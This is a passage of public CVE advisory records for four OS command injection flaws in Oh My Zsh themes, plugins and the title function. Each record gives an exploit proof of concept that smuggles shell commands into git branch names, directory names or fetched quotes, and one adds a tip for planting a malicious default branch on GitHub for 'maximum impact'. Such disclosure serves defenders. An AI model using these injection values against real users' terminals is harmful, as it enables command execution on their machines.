5 vulnerabilities by ohmyzsh
CVE-2021-3769 (GCVE-0-2021-3769)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:09
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes

**Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited.

**Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978).

**Impacted areas**:

- `pygmalion` theme.
- `pygmalion-virtualenv` theme.
- `refined` theme.
Severity
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Impacted products
| Vendor | Product | Version |
|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh | Affected: unspecified, < b3ba9978 (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:09:08.686Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "b3ba9978",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
}
],
"exploits": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n ```sh\n badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:18",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3769",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "b3ba9978"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
}
]
},
"exploit": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n ```sh\n badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n git checkout -b \"$badbranch\"\n ```\n\n In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n ```console\n user@host:~/exploit-poc|master \u21d2 badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n user@host:~/exploit-poc|feat/bad-branch \u21d2 \n ```\n\n A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3769",
"datePublished": "2021-11-30T09:30:18",
"dateReserved": "2021-09-05T00:00:00",
"dateUpdated": "2024-08-03T17:09:08.686Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3727 (GCVE-0-2021-3727)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:01
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `rand-quote` and `hitokoto` plugins

**Description**: the `rand-quote` and `hitokoto` plugins fetch quotes from quotationspage.com and hitokoto.cn respectively, do some processing on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they're an external API, it's not possible to know if the quotes are safe to use.

**Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432).

**Impacted areas**:

- `rand-quote` plugin (`quote` function).
- `hitokoto` plugin (`hitokoto` function).
Severity
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Impacted products
| Vendor | Product | Version |
|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh | Affected: unspecified, < 72928432 (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:01:08.331Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "72928432",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they\u0027re an external API, it\u0027s not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."
}
],
"exploits": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n \u003cp\u003eThe following quotations were randomly selected from the collections selected below .\u003c/p\u003e\u003cdl\u003e\u003cdt class=\"quote\"\u003e\u003ca title=\"Click for further information about this quotation\" href=\"/quote/31081.html\"\u003eWhatever you fear most has no power$(echo PWNED) - it is your fear that has the power.\u003c/a\u003e \u003c/dt\u003e\u003cdd class=\"author\"\u003e\u003cdiv class=\"icons\"\u003e\u003ca title=\"Further information about this quotation\" href=\"/quote/31081.html\"\u003e\u003cimg src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"\u003e\u003cimg src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Email this quotation\" href=\"/quote/31081.html#email\"\u003e\u003cimg src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"\u003e\u003c/a\u003e\u003cimg src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"\u003e\u003c/div\u003e\u003cb\u003e\u003ca href=\"/quotes/Oprah_Winfrey/\"\u003eOprah Winfrey\u003c/a\u003e (1954 - )\u003c/b\u003e, \u003ci\u003eO Magazine\u003c/i\u003e\u003c/dd\u003e\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah 
Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it\u0027s possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:17",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3727",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "72928432"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `rand-quote` and `hitokoto` plugins **Description**: the `rand-quote` and `hitokoto` fetch quotes from quotationspage.com and hitokoto.cn respectively, do some process on them and then use `print -P` to print them. If these quotes contained the proper symbols, they could trigger command injection. Given that they\u0027re an external API, it\u0027s not possible to know if the quotes are safe to use. **Fixed in**: [72928432](https://github.com/ohmyzsh/ohmyzsh/commit/72928432). **Impacted areas**: - `rand-quote` plugin (`quote` function). - `hitokoto` plugin (`hitokoto` function)."
}
]
},
"exploit": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `rand-quote` or `hitokoto` plugins.\n3. Optional: run `quote` or `hitokoto` functions in a precmd hook:\n\n ```zsh\n add-zsh-hook precmd quote\n add-zsh-hook precmd hitokoto\n ```\n\n4. Wait until a quote from either `quotationspage.com` or `hitokoto.cn` contains either\n `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`.\n\n - For the `rand-quote` plugin, this is how a malicious quote would look like (note the `$(echo PWNED)` part):\n\n ```plain\n ...\n \u003cp\u003eThe following quotations were randomly selected from the collections selected below .\u003c/p\u003e\u003cdl\u003e\u003cdt class=\"quote\"\u003e\u003ca title=\"Click for further information about this quotation\" href=\"/quote/31081.html\"\u003eWhatever you fear most has no power$(echo PWNED) - it is your fear that has the power.\u003c/a\u003e \u003c/dt\u003e\u003cdd class=\"author\"\u003e\u003cdiv class=\"icons\"\u003e\u003ca title=\"Further information about this quotation\" href=\"/quote/31081.html\"\u003e\u003cimg src=\"/icon_info.gif\" width=\"16\" height=\"16\" alt=\"[info]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Add to Your Quotations Page\" href=\"/myquotations.php?add=31081\"\u003e\u003cimg src=\"/icon_plus.gif\" width=\"16\" height=\"16\" alt=\"[add]\" border=\"0\"\u003e\u003c/a\u003e\u003ca title=\"Email this quotation\" href=\"/quote/31081.html#email\"\u003e\u003cimg src=\"/icon_email.gif\" width=\"16\" height=\"16\" alt=\"[mail]\" border=\"0\"\u003e\u003c/a\u003e\u003cimg src=\"/icon_blank.gif\" width=\"16\" height=\"16\" alt=\"\" border=\"0\"\u003e\u003c/div\u003e\u003cb\u003e\u003ca href=\"/quotes/Oprah_Winfrey/\"\u003eOprah Winfrey\u003c/a\u003e (1954 - )\u003c/b\u003e, \u003ci\u003eO Magazine\u003c/i\u003e\u003c/dd\u003e\n ...\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ quote\n Oprah 
Winfrey: \u201cWhatever you fear most has no powerPWNED - it is your fear that has the power.\u201d\n ```\n\n Note that it\u0027s possible to submit your own quotes to quotationspage.com so this could be possible if moderators missed it.\n\n - For the `hitokoto` plugin, this is an example of a malicious quote (note the `$(echo PWNED)` part):\n\n ```plain\n {\"id\":7474,\"uuid\":\"0467d7cf-bca2-4cee-81ab-0b0640e51069\",\"hitokoto\":\"\u5979\u62e8\u5f04\u7434\u5f26\uff0c$(echo PWNED)\u626c\u8d77\u6f6e\u6c50\u3002\",\"type\":\"e\",\"from\":\"\u539f\u521b\",\"from_who\":\"\u6211\",\"creator\":\"\u9e22\u5c3e\",\"creator_uid\":9969,\"reviewer\":4756,\"commit_from\":\"web\",\"created_at\":\"1627968443\",\"length\":11}\n ```\n\n Which would be printed by `print -P` as:\n\n ```console\n $ hitokoto\n \u539f\u521b: \u201c\u5979\u62e8\u5f04\u7434\u5f26\uff0cPWNED\u626c\u8d77\u6f6e\u6c50\u3002\u201d\n ```\n\n `hitokoto.cn` also allows adding quotes to the database, so this could also be possible.\n"
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/72928432"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3727",
"datePublished": "2021-11-30T09:30:17",
"dateReserved": "2021-08-19T00:00:00",
"dateUpdated": "2024-08-03T17:01:08.331Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3726 (GCVE-0-2021-3726)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:01
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
# Vulnerability in `title` function

**Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe.

**Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac).

**Impacted areas**:

- `title` function in `lib/termsupport.zsh`.
- Custom user code using the `title` function.
Severity
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Impacted products
| Vendor | Product | Version |
|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh | Affected: unspecified, < a263cdac (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:01:08.345Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "a263cdac",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."
}
],
"exploits": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir=\u0027`echo pwned \u0026\u0026 id`\u0027\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n "
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:15",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3726",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "a263cdac"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "# Vulnerability in `title` function **Description**: the `title` function defined in `lib/termsupport.zsh` uses `print` to set the terminal title to a user-supplied string. In Oh My Zsh, this function is always used securely, but custom user code could use the `title` function in a way that is unsafe. **Fixed in**: [a263cdac](https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac). **Impacted areas**: - `title` function in `lib/termsupport.zsh`. - Custom user code using the `title` function."
}
]
},
"exploit": [
{
"lang": "en",
"value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Add a custom function that calls `title` to set the terminal title with a user-supplied string.\n For example:\n\n ```sh\n function dirpath_in_title {\n title \"$PWD\"\n }\n add-zsh-hook precmd dirpath_in_title\n ```\n\n3. Create and cd into a directory with a subshell command as its name:\n\n ```sh\n baddir=\u0027`echo pwned \u0026\u0026 id`\u0027\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n ```\n\n4. The `title` function incorrectly expands the subshell command (see screenshot):\n\n "
}
],
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-78 OS Command Injection"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac",
"refsource": "MISC",
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/a263cdac"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"assignerShortName": "@huntrdev",
"cveId": "CVE-2021-3726",
"datePublished": "2021-11-30T09:30:15",
"dateReserved": "2021-08-19T00:00:00",
"dateUpdated": "2024-08-03T17:01:08.345Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-3725 (GCVE-0-2021-3725)
Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:01
Title
OS Command Injection in ohmyzsh/ohmyzsh
Summary
Vulnerability in dirhistory plugin

Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection.

Impacted areas:

- Functions pop_past and pop_future in dirhistory plugin.
Severity
7.5 (High)
CWE
- CWE-78 - OS Command Injection
Impacted products
| Vendor | Product | Version |
|---|---|---|
| ohmyzsh | ohmyzsh/ohmyzsh | Affected: unspecified, < 06fc5fb (custom) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T17:01:08.297Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "ohmyzsh/ohmyzsh",
"vendor": "ohmyzsh",
"versions": [
{
"lessThan": "06fc5fb",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin."
}
],
"exploits": [
{
"lang": "en",
"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory\u0027;id;echo \u0027pwned\"\n mkdir \"$baddir\" \u0026\u0026 cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ \u003cAlt-Left\u003e\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 OS Command Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-11-30T09:30:14",
"orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
"shortName": "@huntrdev"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
}
],
"title": "OS Command Injection in ohmyzsh/ohmyzsh",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@huntr.dev",
"ID": "CVE-2021-3725",
"STATE": "PUBLIC",
"TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "ohmyzsh/ohmyzsh",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "06fc5fb"
}
]
}
}
]
},
"vendor_name": "ohmyzsh"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in dirhistory plugin Description: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection. Impacted areas: - Functions pop_past and pop_future in dirhistory plugin."
}
]
